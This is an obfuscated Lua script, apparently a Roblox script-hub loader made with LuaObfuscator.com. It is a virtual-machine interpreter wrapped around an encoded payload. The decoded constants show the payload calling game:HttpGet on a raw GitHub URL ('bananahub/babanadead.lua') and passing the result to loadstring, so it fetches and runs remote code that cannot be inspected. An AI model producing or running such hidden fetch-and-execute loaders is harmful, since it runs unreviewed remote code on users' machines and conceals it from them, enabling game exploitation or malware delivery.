--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v105=0;local v106;while true do if (v105==1) then return v106;end if (v105==0) then v106=v5(v83,v19);v19=nil;v105=1;end end else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/(2^(v32-(2 -1))))%((5 -(1 + 2))^(((v33-(1 -0)) -(v32-(2 -1))) + 1)) ;return v84-(v84%(620 -(555 + 64))) ;else local v85=(933 -(857 + 74))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (569 -(367 + 201))) or (927 -(214 + (1590 -(282 + 595)))) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=1637 -(1523 + 112 + 2) ;local v36;local v37;while true do if (v35==(1 + 0)) then return (v37 * (364 -108)) + v36 ;end if (v35==(1065 -(68 + 997))) then v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;v35=118 -(8 + 24 + 85) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (961 -(892 + 65)) ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * 256) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 -(0 + 0) ;local v45=(v20(v43,351 -(87 + 263) ,200 -(67 + 113) ) * ((2 + 0)^(78 -46))) + v42 ;local v46=v20(v43,16 + 5 ,123 -(883 -(368 + 423)) );local v47=((v20(v43,32)==(953 -(802 + (471 -321)))) and  -(2 -1)) or (1 -0) ;if (v46==((18 -(10 + 8)) + 0)) then if (v45==(997 -(915 + 82))) then return v47 * (0 -(0 -0)) ;else v46=1 + 0 ;v44=0 -0 ;end elseif (v46==(3234 -(1069 + 118))) then return ((v45==(0 -(442 -(416 + 26)))) and (v47 * (((3 -2) -0)/0))) or (v47 * NaN) ;end return v8(v47,v46-(178 + 845) ) * (v44 + (v45/(2^(92 -40)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 -0) );v18=v18 + v48 ;local v50={};for v65=439 -(145 + 293) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 + 0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v51~=2) then else local v88=(function() return 0;end)();local v89=(function() return;end)();while true do if (v88~=(836 -(660 + 176))) then else v89=(function() return 0 + 0 ;end)();while true do if (v89==(203 -(14 + 188))) then v56[ #"91("]=(function() return v21();end)();v51=(function() return 678 -(534 + 141) ;end)();break;end if ((0 + 0)==v89) then v58=(function() return {};end)();for v115= #"]",v57 do local v116=(function() return 0 + 0 ;end)();local v117=(function() return;end)();local v118=(function() return;end)();local v119=(function() return;end)();while true do if (v116==(561 -(306 + 254))) then v119=(function() return nil;end)();while true do if ((0 + 0)~=v117) then else local v175=(function() return 0 -0 ;end)();while true do if (v175==(1 -0)) then v117=(function() return 1 + 0 ;end)();break;end if (v175==(0 -0)) then v118=(function() return v21();end)();v119=(function() return nil;end)();v175=(function() return 1 -0 ;end)();end end end if (v117==(1 + 0)) then if (v118== #"[") then v119=(function() return v21()~=0 ;end)();elseif (v118==2) then v119=(function() return v24();end)();elseif (v118== #"xnx") then v119=(function() return v25();end)();end v58[v115]=(function() return v119;end)();break;end end break;end if (v116==(0 + 0)) then v117=(function() return 0 + 0 ;end)();v118=(function() return nil;end)();v116=(function() return 1;end)();end end end v89=(function() return 604 -(268 + 335) ;end)();end end break;end end end if (v51==1) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v51=(function() return 2;end)();end if (v51~=(0 -0)) then else local v90=(function() return 0;end)();while true do if (v90==0) then v52=(function() return function(v107,v108,v109) local v110=(function() return 290 -(60 + 230) ;end)();local v111=(function() return;end)();while true do if (v110==(0 + 0)) then v111=(function() return 0 -0 ;end)();while true do if (v111==(0 -0)) then local v167=(function() return 867 -(550 + 317) ;end)();local v168=(function() return;end)();while true do if (v167==(0 -0)) then v168=(function() return 0 -0 ;end)();while true do if (v168==0) then v107[v108-#"!" ]=(function() return v109();end)();return v107,v108,v109;end end break;end end end end break;end end end;end)();v53=(function() return {};end)();v90=(function() return 2 -1 ;end)();end if (v90==1) then v54=(function() return {};end)();v51=(function() return 1 + 0 ;end)();break;end end end if (v51~=3) then else for v91= #",",v23() do local v92=(function() return v21();end)();if (v20(v92, #".", #"!")==(0 -0)) then local v100=(function() return 285 -(134 + 151) ;end)();local v101=(function() return;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v100==(1025 -(706 + 318))) then local v113=(function() return 1251 -(721 + 530) ;end)();while true do if (v113~=0) then else v103=(function() return nil;end)();v104=(function() return nil;end)();v113=(function() return 1666 -(970 + 695) ;end)();end if (v113==(1272 -(945 + 326))) then v100=(function() return 4 -2 ;end)();break;end end end if (v100~=(3 -1)) then else while true do if ((1992 -(582 + 1408))==v101) then local v152=(function() return 0 + 0 ;end)();local v153=(function() return;end)();while true do if (v152~=(0 -0)) then else v153=(function() return 1086 -(461 + 625) ;end)();while true do if (v153==0) then if (v20(v103, #" ", #"!")~= #"!") then else v104[2 -0 ]=(function() return v58[v104[2]];end)();end if (v20(v103,1290 -(993 + 295) ,1 + 1 )== #">") then v104[ #"nil"]=(function() return v58[v104[ #"91("]];end)();end v153=(function() return 1172 -(418 + 753) ;end)();end if (v153~=(3 -2)) then else v101=(function() return  #"-19";end)();break;end end break;end end end if (v101~= #">") then else local v154=(function() return 0;end)();local v155=(function() return;end)();while true do if ((1824 -(1195 + 629))~=v154) then else v155=(function() return 0 + 0 ;end)();while true do if (v155~=(1 -0)) then else v101=(function() return 243 -(187 + 54) ;end)();break;end if (v155==(780 -(162 + 618))) then v104=(function() return {v22(),v22(),nil,nil};end)();if (v102==(1769 -(1749 + 20))) then local v182=(function() return 0 + 0 ;end)();local v183=(function() return;end)();while true do if (v182~=(0 + 0)) then else v183=(function() return 1322 -(1249 + 73) ;end)();while true do if (v183==(0 + 0)) then v104[ #"91("]=(function() return v22();end)();v104[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v102== #"~") then v104[ #"-19"]=(function() return v23();end)();elseif (v102==(1147 -(466 + 679))) then v104[ #"19("]=(function() return v23() -(2^(11 + 5)) ;end)();elseif (v102== #"91(") then local v188=(function() return 0 -0 ;end)();local v189=(function() return;end)();while true do if (v188==(0 -0)) then v189=(function() return 0;end)();while true do if (v189==(0 -0)) then v104[ #"asd"]=(function() return v23() -(2^16) ;end)();v104[ #"0836"]=(function() return v22();end)();break;end end break;end end end v155=(function() return 1;end)();end end break;end end end if (v101~= #"asd") then else if (v20(v103, #"xxx", #"-19")== #"[") then v104[ #".com"]=(function() return v58[v104[ #"asd1"]];end)();end v53[v91]=(function() return v104;end)();break;end if (v101==(0 + 0)) then local v157=(function() return 1636 -(1373 + 263) ;end)();local v158=(function() return;end)();while true do if (v157~=(1000 -(451 + 549))) then else v158=(function() return 0 + 0 ;end)();while true do if (v158~=(0 + 0)) then else v102=(function() return v20(v92,1 + 1 , #"91(");end)();v103=(function() return v20(v92, #"?id=",9 -3 );end)();v158=(function() return 1 -0 ;end)();end if (v158~=(2 -1)) then else v101=(function() return  #"|";end)();break;end end break;end end end end break;end if ((1384 -(746 + 638))~=v100) then else local v114=(function() return 0 + 0 ;end)();while true do if ((1 -0)==v114) then v100=(function() return 1;end)();break;end if (v114~=(341 -(218 + 123))) then else v101=(function() return 114 -(4 + 110) ;end)();v102=(function() return nil;end)();v114=(function() return 1582 -(1535 + 46) ;end)();end end end end end end for v93= #"\\",v23() do v54,v93,v28=(function() return v52(v54,v93,v28);end)();end return v56;end end end local function v29(v59,v60,v61) local v62=v59[1428 -(41 + (2404 -(697 + 321))) ];local v63=v59[105 -(17 + (234 -148)) ];local v64=v59[3 + 0 ];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=2 -1 ;local v72= -(1 -0);local v73={};local v74={...};local v75=v12("#",...) -(441 -(382 + 58)) ;local v76={};local v77={};for v86=(0 -0) -0 ,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + (754 -(239 + (1648 -1134))) ];else v77[v86]=v74[v86 + (167 -(122 + 44)) ];end end local v78=(v75-v69) + (1330 -(797 + 532)) ;local v79;local v80;while true do local v87=0 + 0 ;while true do if (v87==((0 -0) -0)) then v79=v67[v71];v80=v79[1 + 0 ];v87=2 -1 ;end if ((v87==(3 -2)) or (4177>4850)) then if ((v80<=(3 + 0 + 0)) or (400>1111)) then if ((3051>1005) and (v80<=(1131 -(369 + 761)))) then if ((3693<=4382) and (v80>(0 + 0))) then v77[v79[3 -1 ]]={};else v77[v79[(138 -71) -(12 + 18 + 35) ]]=v79[3 + 0 ];end elseif ((v80==(1259 -(1043 + 214))) or (3282>4100)) then local v123;local v124,v125;local v126;local v127;v77[v79[(20 -13) -5 ]]={};v71=v71 + (1213 -(323 + 889)) ;v79=v67[v71];v77[v79[338 -(144 + (1397 -(902 + 303))) ]]=v61[v79[219 -(42 + (325 -151)) ]];v71=v71 + (2 -1) ;v79=v67[v71];v77[v79[582 -(361 + 219) ]]=v61[v79[323 -(53 + 267) ]];v71=v71 + 1 + 0 ;v79=v67[v71];v127=v79[2];v126=v77[v79[416 -(15 + 398) ]];v77[v127 + (2 -1) ]=v126;v77[v127]=v126[v79[(7 -4) + 1 ]];v71=v71 + (983 -(18 + 964)) ;v79=v67[v71];v77[v79[(16 -9) -(1232 -(322 + 905)) ]]=v79[2 + 1 ];v71=v71 + 1 + (611 -(602 + 9)) ;v79=v67[v71];v127=v79[5 -3 ];v124,v125=v70(v77[v127](v13(v77,v127 + (851 -(20 + 830)) ,v79[11 -8 ])));v72=(v125 + v127) -(1 + 0) ;v123=0;for v159=v127,v72 do v123=v123 + (127 -(10 + 106 + 10)) ;v77[v159]=v124[v123];end v71=v71 + 1 + (1189 -(449 + 740)) ;v79=v67[v71];v127=v79[(1730 -(826 + 46)) -(564 + 292) ];v77[v127]=v77[v127](v13(v77,v127 + ((1686 -(245 + 702)) -(542 + 196)) ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[(1693 -(1121 + 569)) -1 ]]();v71=v71 + (215 -(22 + 192)) + 0 ;v79=v67[v71];do return;end else local v143=0 + 0 ;local v144;local v145;while true do if (v143==(0 + 0)) then v144=v79[2];v145=v77[v79[3]];v143=(685 -(483 + 200)) -1 ;end if (v143==1) then v77[v144 + (2 -1) ]=v145;v77[v144]=v145[v79[1005 -(938 + 63) ]];break;end end end elseif (v80<=(1556 -(1126 + 425))) then if ((v80>((1292 -883) -(118 + 287))) or (3580<2844)) then local v146=v79[(1470 -(1404 + 59)) -5 ];local v147,v148=v70(v77[v146](v13(v77,v146 + (1122 -(118 + 1003)) ,v79[8 -5 ])));v72=(v148 + v146) -(378 -(142 + 235)) ;local v149=1138 -(782 + 356) ;for v162=v146,v72 do v149=v149 + (4 -3) ;v77[v162]=v147[v149];end else v77[v79[1 + 1 ]]=v61[v79[4 -1 ]];end elseif (v80<=((353 + 745) -(975 + 117))) then do return;end elseif (v80>(984 -(553 + 424))) then local v165=0 -0 ;local v166;while true do if (v165==(0 + 0)) then v166=v79[2 + 0 ];v77[v166]=v77[v166](v13(v77,v166 + 1 + 0 ,v72));break;end end else v77[v79[1 + 1 ]]();end v71=v71 + 1 + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403513Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F7A79722Q6F692F62616E616E616875622F726566732F68656164732F6D61696E2F626162616E61646561642E6C756100094Q00027Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
